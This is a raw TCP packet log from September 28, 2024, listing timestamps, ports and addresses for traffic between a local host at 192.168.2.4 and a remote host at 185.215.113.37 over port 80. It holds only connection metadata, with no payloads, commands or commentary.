Sep 28, 2024 21:26:14.701704025 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.701874018 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.701884031 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.701894045 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.701903105 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.701913118 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.701924086 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.701934099 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.701935053 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.701934099 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.701945066 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.701960087 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.701977015 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.702008009 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.702176094 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.702186108 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.702193975 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.702204943 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.702213049 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.702223063 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.702229977 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.702250004 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.702270985 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.702470064 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.702480078 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.702487946 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.702508926 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.702517986 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.702522993 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.702522993 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.702528954 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.702538967 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.702548981 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.702548981 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.702560902 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.702589035 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.702589035 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.702615976 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.703022003 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.703032017 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.703041077 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.703048944 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.703058958 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.703068972 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.703078032 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.703079939 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.703088999 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.703100920 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.703110933 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.703119993 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.703119993 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.703155041 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.703155041 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.703505993 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.703515053 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.703525066 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.703535080 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.703543901 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.703552961 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.703557014 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.703562975 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.703576088 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.703588963 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.703619003 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.703654051 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.703969002 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.703979015 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.703988075 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.703996897 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.704005003 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.704014063 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.704015970 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.704035997 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.704045057 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.704047918 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.704055071 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.704066038 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.704066038 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.704077005 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.704087973 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.704097986 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.704102039 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.704108000 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.704121113 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.704123974 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.704130888 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.704143047 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.704144955 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.704169989 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.704169989 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.704196930 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.704982996 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.704993010 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.705002069 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.705009937 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.705022097 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.705033064 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.705043077 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.705051899 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.705060005 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.705060005 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.705063105 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.705074072 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.705082893 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.705089092 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.705089092 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.705094099 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.705104113 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.705115080 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.705115080 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.705125093 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.705136061 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.705149889 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.705176115 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.828255892 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.828279018 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.828289032 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.828319073 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.828356981 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.828413963 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.828424931 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.828433037 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.828469038 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.828469038 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.828520060 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.828564882 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.828639030 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.828649998 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.828659058 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.828670979 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.828680992 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.828691006 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.828726053 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.828726053 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.828843117 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.828886986 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.828936100 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.828947067 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.828954935 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.828983068 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.829015970 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.829082012 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.829092026 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.829102039 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.829112053 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.829124928 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.829128027 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.829164982 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.829164982 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.829360962 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.829370975 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.829380035 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.829390049 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.829400063 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.829400063 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.829412937 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.829425097 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.829436064 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.829441071 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.829448938 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.829458952 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.829482079 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.829511881 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.830277920 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.830297947 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.830308914 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.830319881 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.830331087 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.830332041 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.830331087 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.830348015 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.830360889 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.830363989 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.830363989 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.830373049 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.830384016 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.830384970 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.830396891 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.830405951 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.830413103 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.830415010 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.830425978 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.830435038 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.830436945 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.830447912 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.830451965 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.830459118 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.830471992 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.830476046 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.830497026 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.830533028 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.830678940 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.830688953 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.830698013 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.830717087 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.830741882 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.830871105 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.830882072 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.830890894 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.830914021 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.830915928 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.830915928 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.830925941 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.830936909 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.830938101 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.830948114 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.830960035 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.830964088 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.830964088 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.830970049 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.830993891 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.831000090 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.831020117 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.831036091 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.831408978 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.831418037 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.831427097 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.831446886 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.831451893 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.831458092 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.831468105 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.831475019 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.831479073 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.831489086 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.831495047 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.831499100 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.831511021 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.831513882 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.831521034 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.831532955 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.831533909 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.831543922 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.831563950 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.831607103 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.832226038 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.832236052 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.832245111 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.832252979 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.832262993 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.832273006 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.832276106 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.832284927 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.832294941 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.832297087 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.832309961 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.832319021 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.832329988 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.832330942 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.832330942 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.832339048 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.832350969 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.832357883 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.832362890 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.832372904 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.832374096 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.832386017 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.832396030 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.832396030 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.832416058 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.832436085 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.833070040 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.833080053 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.833089113 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.833100080 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.833108902 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.833120108 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.833122015 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.833133936 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.833144903 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.833146095 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.833147049 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.833156109 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.833167076 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.833177090 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.833185911 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.833194971 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.833203077 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.833201885 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.833214998 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.833230019 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.833230972 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.833240986 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.833256960 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.833256960 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.833280087 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.833868027 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.833878994 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.833887100 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.833895922 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.833905935 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.833910942 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.833915949 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.833929062 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.833931923 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.833952904 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.833983898 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.933285952 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.933317900 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.933327913 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.933434010 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.933435917 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.933444977 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.933454990 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.933492899 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.933521986 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.933536053 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.933547020 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.933594942 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.934283018 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.934331894 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.934340954 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.934343100 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.934385061 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.934385061 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.934428930 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.934474945 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.934489965 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.934501886 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.934511900 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.934542894 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.934572935 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.934575081 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.934628010 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.934665918 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.934675932 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.934685946 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.934700012 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.934711933 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.934719086 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.934741020 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.934770107 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.934931040 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.934942007 CEST	80	49732	185.215.113.37	192.168.2.4
